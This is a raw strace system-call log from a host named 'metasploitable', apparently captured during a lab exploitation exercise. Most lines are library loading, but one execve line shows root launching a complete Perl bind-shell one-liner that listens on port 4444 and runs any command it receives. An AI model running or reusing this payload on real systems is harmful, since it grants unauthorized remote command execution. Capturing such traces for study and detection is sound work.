7392  07:18:31.384705 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d8f000

7392  07:18:31.384717 mmap2(0xb7da3000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7da3000

7392  07:18:31.384732 mmap2(0xb7da5000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7da5000

7392  07:18:31.384747 close(1)          = 0

7392  07:18:31.384773 munmap(0xb7f35000, 29913) = 0

7392  07:18:31.384790 open("/etc/ld.so.cache", O_RDONLY) = 1

7392  07:18:31.384803 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7392  07:18:31.384820 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f35000

7392  07:18:31.384830 close(1)          = 0

7392  07:18:31.384841 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7392  07:18:31.384856 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

7392  07:18:31.384870 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7392  07:18:31.384968 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

7392  07:18:31.384986 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d85000

7392  07:18:31.384998 mmap2(0xb7d8d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d8d000

7392  07:18:31.385014 close(1)          = 0

7392  07:18:31.385027 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7392  07:18:31.385041 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

7392  07:18:31.385055 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7392  07:18:31.385148 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

7392  07:18:31.385166 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d7a000

7392  07:18:31.385178 mmap2(0xb7d83000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d83000

7392  07:18:31.385195 close(1)          = 0

7392  07:18:31.385216 munmap(0xb7f35000, 29913) = 0

7392  07:18:31.385232 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

7392  07:18:31.385247 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

7392  07:18:31.385259 _llseek(1, 0, [0], SEEK_CUR) = 0

7392  07:18:31.385270 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

7392  07:18:31.385287 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f3c000

7392  07:18:31.385298 _llseek(1, 1624, [1624], SEEK_SET) = 0

7392  07:18:31.385313 munmap(0xb7f3c000, 1624) = 0

7392  07:18:31.385323 close(1)          = 0

7392  07:18:31.385351 getpgrp()         = 3831

7392  07:18:31.385362 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

7392  07:18:31.385377 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

7392  07:18:31.385393 brk(0x8101000)    = 0x8101000

7392  07:18:31.385504 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7392  07:18:31.385559 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7392  07:18:31.385574 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7392  07:18:31.385611 brk(0x8102000)    = 0x8102000

7392  07:18:31.385638 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7392  07:18:31.385657 stat64("/sbin/AB", 0xbfc2a278) = -1 ENOENT (No such file or directory)

7392  07:18:31.385670 stat64("/bin/AB", 0xbfc2a278) = -1 ENOENT (No such file or directory)

7392  07:18:31.385681 stat64("/usr/sbin/AB", 0xbfc2a278) = -1 ENOENT (No such file or directory)

7392  07:18:31.385693 stat64("/usr/bin/AB", 0xbfc2a278) = -1 ENOENT (No such file or directory)

7392  07:18:31.385707 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7392  07:18:31.385721 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7db06f8) = 7393

7393  07:18:31.385766 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7393  07:18:31.385782 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7393  07:18:31.385796 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7393  07:18:31.385808 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7393  07:18:31.385823 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7393  07:18:31.385840 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7393  07:18:31.385853 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7393  07:18:31.385908 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

7393  07:18:31.385922 --- SIGPIPE (Broken pipe) @ 0 (0) ---

7393  07:18:31.385989 exit_group(127)   = ?

4519  07:18:31.392325 waitpid(7392,  <unfinished ...>

7392  07:18:31.401812 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7392  07:18:31.401812 --- SIGCHLD (Child exited) @ 0 (0) ---

7392  07:18:31.401812 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 7393

7392  07:18:31.401812 waitpid(-1, 0xbfc29ef8, WNOHANG) = -1 ECHILD (No child processes)

7392  07:18:31.401812 sigreturn()       = ? (mask now [])

7392  07:18:31.401813 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7392  07:18:31.401813 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7392  07:18:31.401813 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7392  07:18:31.401813 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

7392  07:18:31.401813 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7392  07:18:31.401814 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

7392  07:18:31.401814 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7392  07:18:31.401814 stat64("/sbin/perl", 0xbfc2a2a8) = -1 ENOENT (No such file or directory)

7392  07:18:31.401824 stat64("/bin/perl", 0xbfc2a2a8) = -1 ENOENT (No such file or directory)

7392  07:18:31.401836 stat64("/usr/sbin/perl", 0xbfc2a2a8) = -1 ENOENT (No such file or directory)

7392  07:18:31.401850 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7392  07:18:31.401868 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7392  07:18:31.401894 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7392  07:18:31.401909 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7db06f8) = 7394

7394  07:18:31.421808 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7394  07:18:31.421808 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7394  07:18:31.421808 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7394  07:18:31.421809 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7394  07:18:31.421809 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7394  07:18:31.421809 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7394  07:18:31.421809 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7394  07:18:31.421810 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

7394  07:18:31.421810 brk(0)            = 0x8153000

7394  07:18:31.421827 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7394  07:18:31.421843 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f8f000

7394  07:18:31.421859 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7394  07:18:31.421876 open("/etc/ld.so.cache", O_RDONLY) = 1

7394  07:18:31.421888 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7394  07:18:31.421906 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f87000

7394  07:18:31.421916 close(1)          = 0

7394  07:18:31.421927 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7394  07:18:31.421942 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7394  07:18:31.421989 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7394  07:18:31.422098 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7394  07:18:31.422116 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f83000

7394  07:18:31.422128 mmap2(0xb7f85000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f85000

7394  07:18:31.422145 close(1)          = 0

7394  07:18:31.422156 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7394  07:18:31.422170 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

7394  07:18:31.422184 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

7394  07:18:31.422270 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

7394  07:18:31.422287 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f5e000

7394  07:18:31.422298 mmap2(0xb7f81000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f81000

7394  07:18:31.422313 close(1)          = 0

7394  07:18:31.422325 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7394  07:18:31.422339 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

7394  07:18:31.422353 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

7394  07:18:31.422437 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

7394  07:18:31.422482 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f5d000

7394  07:18:31.422496 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f45000

7394  07:18:31.422521 mmap2(0xb7f59000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f59000

7394  07:18:31.422535 mmap2(0xb7f5b000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f5b000

7394  07:18:31.422549 close(1)          = 0

7394  07:18:31.422561 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7394  07:18:31.422577 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7394  07:18:31.422591 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7394  07:18:31.422678 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7394  07:18:31.422695 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7df6000

7394  07:18:31.422706 mmap2(0xb7f3f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f3f000

7394  07:18:31.422721 mmap2(0xb7f42000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f42000

7394  07:18:31.422734 close(1)          = 0

7394  07:18:31.422746 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7394  07:18:31.422759 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

7394  07:18:31.422773 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

7394  07:18:31.422860 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

7394  07:18:31.422877 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dc4000

7394  07:18:31.422888 mmap2(0xb7dcd000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dcd000

7394  07:18:31.422902 mmap2(0xb7dcf000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dcf000

7394  07:18:31.422916 close(1)          = 0

7394  07:18:31.422939 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dc3000

7394  07:18:31.422979 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dc38c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7394  07:18:31.423052 mprotect(0xb7f3f000, 4096, PROT_READ) = 0

7394  07:18:31.423079 munmap(0xb7f87000, 29913) = 0

7394  07:18:31.423092 set_tid_address(0xb7dc3908) = 7394

7394  07:18:31.423105 set_robust_list(0xb7dc3910, 0xc) = 0

7394  07:18:31.423115 futex(0xbfa4eef0, 0x81 /* FUTEX_??? */, 1) = 0

7394  07:18:31.423129 rt_sigaction(SIGRTMIN, {0xb7f492c0, [], SA_SIGINFO}, NULL, 8) = 0

7394  07:18:31.423141 rt_sigaction(SIGRT_1, {0xb7f49340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

7394  07:18:31.423154 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

7394  07:18:31.423167 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

7394  07:18:31.423186 uname({sys="Linux", node="metasploitable", ...}) = 0

7394  07:18:31.423231 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

7394  07:18:31.423277 brk(0)            = 0x8153000

7394  07:18:31.423287 brk(0x8174000)    = 0x8174000

7394  07:18:31.423330 getuid32()        = 0

7394  07:18:31.423340 geteuid32()       = 0

7394  07:18:31.423350 getgid32()        = 0

7394  07:18:31.423359 getegid32()       = 0

7394  07:18:31.423395 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7da2000

7394  07:18:31.423421 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

7394  07:18:31.423438 read(1, "\352\341\240h", 4) = 4

7394  07:18:31.423503 close(1)          = 0

7394  07:18:31.423559 time(NULL)        = 1495624711

7394  07:18:31.423683 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfa4ebc0) = -1 ENOENT (No such file or directory)

7394  07:18:31.423701 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfa4ebc0) = -1 ENOENT (No such file or directory)

